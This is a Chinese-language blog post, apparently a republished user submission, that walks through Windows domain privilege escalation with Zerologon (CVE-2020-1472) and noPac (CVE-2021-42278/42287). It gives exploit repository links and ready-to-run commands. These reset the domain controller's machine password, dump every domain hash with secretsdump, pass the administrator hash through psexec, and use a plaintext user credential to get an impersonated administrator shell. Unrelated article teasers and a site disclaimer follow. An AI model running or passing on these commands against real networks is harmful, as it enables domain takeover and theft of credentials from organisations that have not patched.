域內的權限提升

CVE-2020-1472

域內有一個服務:MS-NRPC(建立與域控安全通道),可利用此漏洞獲取域管訪問權限。

  1. 檢測這個漏洞能不能打,能打之后,將域控的機器hash置空,密碼為空,那么你就可以通過空的hash讀取administrator的密碼(dcsync,administrator domain admins 機器用戶,domain control)
  1. 環境的準備
windows2019 域控
Impacket工具包:https://github.com/SecureAuthCorp/impacket.git
poc:https://github.com/SecuraBV/CVE-2020-1472.git
exp:https://github.com/dirkjanm/CVE-2020-1472
exp:https://github.com/risksense/zerologon
  1. 先用poc檢測
https://github.com/SecuraBV/CVE-2020-1472
python zerologon_tester.py WIN-EB8RC552TFJ 10.10.10.90
Given a domain controller named `WIN-EB8RC552TFJ` with IP address `192.168.7.49`, run the script as follows

  1. 在使用exp利用
https://github.com/dirkjanm/CVE-2020-1472
python cve-2020-1472-exploit.py WIN-EB8RC552TFJ 10.10.10.90

  1. PTH拿下域控
secretsdump該工具讀取域內全部的hash
secretsdump.exe sis2504/WIN-EB8RC552TFJ$@10.10.10.90 -just-dc -no-pass

psexec.exe administrator@10.10.10.90 -hashes aad3b435b51404eeaad3b435b51404ee:937b842c7cfa612cc40196a5d89b4823

CVE-2021-42278 & CVE-2021-42287

域內允許加入域的用的(我們的客戶機在加入域的時候,會輸入一個賬戶名和密碼,域允許這個用戶創建一個機器賬戶),域允許這個用戶(test001)創建一個機器用戶(域控制器的hostname--dc,dc$)當你用DC$(test001創建的這個機器賬戶申請票據的時候,域控會將你識別成自己,就把自己的票(TGT))就發給你了,你是不是就擁有了一張高權限的票。

  1. 利用條件
具有一個域內的合法的用戶 -- 低權限 高權限 都可以
合法的用戶怎么獲取:用戶名+密碼噴灑 asprating kerberosting
  1. 漏洞利用
先做掃描 -- 檢測一下這個漏洞能不能打 poc的檢測
python scanner.py sis2504.club/zhangli:"FLW.com12138a" -dc-ip 192.168.7.49 -use-ldap

python noPac.py sis2504.club/zhangli:"FLW.com12138a" -dc-ip 192.168.7.49 -dc-host WIN-EB8RC552TFJ -shell --impersonate administrator -use-ldap

其他的用法自己看readme.md

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/95484.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/95484.shtml
英文地址,請注明出處:http://en.pswp.cn/web/95484.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

一鍵掌握服務器健康狀態與安全風險

一鍵掌握服務器健康狀態與安全風險 在服務器運維工作中,定期對系統進行全面檢查是保障服務穩定運行的關鍵環節。手動檢查不僅耗時費力,還容易遺漏關鍵指標。今天我將為大家介紹一款功能全面的系統綜合巡檢工具,只需一鍵運行,即可完成系統狀態、性能、安全等多維度檢查,并…

線性代數第一講—向量組

文章目錄考綱術語向量組的線性表示與線性相關判別線性相關性的七大定理極大線性無關組、等價向量組、向量組的秩等價矩陣和等價向量組向量空間基本概念基變換、坐標變換 考綱術語 n維向量n維行向量n維列向量分量向量相等向量的加法向量的數乘向量的內積正交向量的模單位向量標準…

涉私數據安全與可控匿名化利用機制研究(下)

文章目錄前言三、可信數據空間支撐可控匿名化機制(一)基于政府可信根的可控匿名化(二)可信數據空間“中國模式”保障數據全生命周期合規可控(三)可控匿名化對大模型數據可逆風險的防御機制前言 盡管《個人…

More Effective C++ 條款25:將構造函數和非成員函數虛擬化

More Effective C 條款25:將構造函數和非成員函數虛擬化核心思想:通過虛擬構造函數和非成員函數,實現運行時的多態行為,允許在不知道對象具體類型的情況下創建新對象或執行操作,增強代碼的靈活性和擴展性。 &#x1f6…

血緣元數據采集開放標準:OpenLineage Guides 在 Airflow 中使用 OpenLineage Proxy

OpenLineage 是一個用于元數據和血緣采集的開放標準,專為在作業運行時動態采集數據而設計。它通過統一的命名策略定義了由作業(Job)、運行實例(Run)和數據集(Dataset) 組成的通用模型&#xff0…

【Linux】網絡(中)

目錄1. 序列化和反序列化1.1 序列化1.2 反序列化2. 網絡版本計算器(自定義協議)3. 再次理解OSI七層模型4. HTTP協議4.1 HTTP協議格式4.2 HTTP的方法4.3 HTTP的狀態碼4.4 HTTP常見Header4.5 長連接和短連接4.6 Cookie5. HTTPS協議5.1 對稱加密和非對稱加密…

AI 寫作實戰:用 GPT-4o+ Claude 3 生成小紅書文案,轉化率提升 30%

引言?AI 寫作開啟小紅書營銷新引擎在社交媒體營銷的浪潮中,小紅書以其獨特的社區氛圍和龐大的年輕用戶群體,成為品牌推廣的關鍵陣地。然而,撰寫既吸引眼球又能高效轉化的文案并非易事,傳統人工編寫不僅耗時費力,還難以…

一個月漲粉30萬,Coze智能體一鍵生成民間傳說爆款視頻,3分鐘上手

最近發現一個賬號,用AI將民間傳說故事轉化為生動視頻,短短一個月漲粉30萬,條均播放 量破百萬。這種視頻制作真的需要專業團隊嗎?今天教大家用Coze智能體工作流,一鍵生成 爆款民間故事視頻!工作流功能 用Coz…

Linux arm64 PTE contiguous bit

文章目錄一、簡介1.1 contiguous PTE1.2 demo二、Linux 內核中的實現2.1 宏定義2.2 __create_pgd_mapping2.2.1 alloc_init_cont_pmdinit_pmd2.2.2 alloc_init_cont_pteinit_pte2.3 hugetlbpage2.3.1 find_num_contig2.3.2 num_contig_ptes2.3.3 huge_pte_offset2.3.4 huge_pte…

深入分析 json2(新)與標準的 jsonrpc的區別

這兩個模塊都用于實現 JSON 風格的遠程過程調用(RPC)接口,但設計哲學、使用方式、安全性和現代化程度有顯著差異。 📂 對比背景 文件 功能 來源 jsonrpc.py 標準的 JSON-RPC 2.0 兼容接口 Odoo 內核已有邏輯 json2.py 自定…

IO_HW_9_3

一、使用消息隊列實現兩個程序間的相互通信二、思維導圖三、牛客網

fastlio配置與過程中遇到的問題

🚀 Fast-LIO 安裝與運行指南 我之前已經創建并使用原有的工作空間 catkin_ws,如果沒有創建一個。 使用環境 ubantu20.04 ros1 noetic版本 我作的是要在已有的 ~/catkin_ws 中編譯 原版 FAST-LIO(來自 HKU-MARS 官方倉庫)。 最終下載官方文檔中…

Python 工具: Windows 帶寬監控工具

Python 工具: Windows 帶寬監控工具環境介紹會使用的庫多線程關鍵代碼:系統流量采集:用 psutil 獲取網絡數據概念:網絡流量的“增量”與“總量”代碼中的流量采集邏輯Flask Web框架:搭建后端服務前端部分交互邏輯&…

【Java】Redis(中間件)

一、對Redis的理解Reids是一種基于內存的數據庫,對數據的讀寫操作都在內存中完成,因此讀寫速度非常快,常用于緩存、消息隊列、分布式鎖等場景。除此之外,Redis還支持事務、持久化、Lua腳本、多種集群方案(主從復制模式…

【題解】洛谷P1776 寶物篩選 [單調隊列優化多重背包]

二進制優化還是不夠快,如果我們想時間復雜度為 ,還得找新的方法。 (W 為背包最大可承載量,N 為物品種類數) 例題:P1776 寶物篩選 - 洛谷 原來的轉移式很普通: 注意到對于每個 ,有…

數據結構_循環隊列_犧牲一個存儲空間_不犧牲額外的存儲空間 Circular Queue(C語言實現_超詳細)

目錄循環隊列的引出區別普通隊列和循環隊列兩種循環隊列的概念循環隊列深入理解題目:此題,分為犧牲一個額外空間和不犧牲一個額外空間不犧牲一個額外空間完成第一步完成第二步完成第三步完成第四步犧牲一個額外空間完成第一步完成第二步完成第三步完成第…

Linux_網絡基礎

?? 歡迎大家來到小傘的大講堂?? 🎈🎈養成好習慣,先贊后看哦~🎈🎈 所屬專欄:LInux_st 小傘的主頁:xiaosan_blog 制作不易!點個贊吧!!謝謝喵!&a…

Portainer:Docker可視化管理神器部署與使用攻略

Portainer是一款優秀的Docker可視化管理工具,它提供了簡潔美觀的Web界面,可以通過點擊鼠標輕松管理Docker環境。 一、Portainer簡介 Portainer是一個輕量級的Docker管理界面,具有以下特點: 可視化操作:通過Web界面管…

OVITO3.13.1_ Mac中文_材料科學、物理及化學領域設計的數據可視化和分析軟件_安裝教程

軟件下載 【名稱】:****OVITO3.13.1Mac中文 【大小】:****154M 【語言】:簡體中文 【安裝環境】:****mac 【網站下載鏈接】: https://a-xing.top/3008.html軟件應用 軟件應用 Ovito能做什么? Ovito的功能十…

MySQL 開發避坑:DROP TABLE 前你必須知道的幾件事

MySQL 中刪除表主要使用 DROP TABLE 語句。這是一個需要非常謹慎的操作,因為一旦執行,表結構和表中的所有數據都會被永久刪除。1. 基本語法:刪除單個表sqlDROP TABLE [IF EXISTS] table_name;* DROP TABLE: 核心命令,用于刪除表…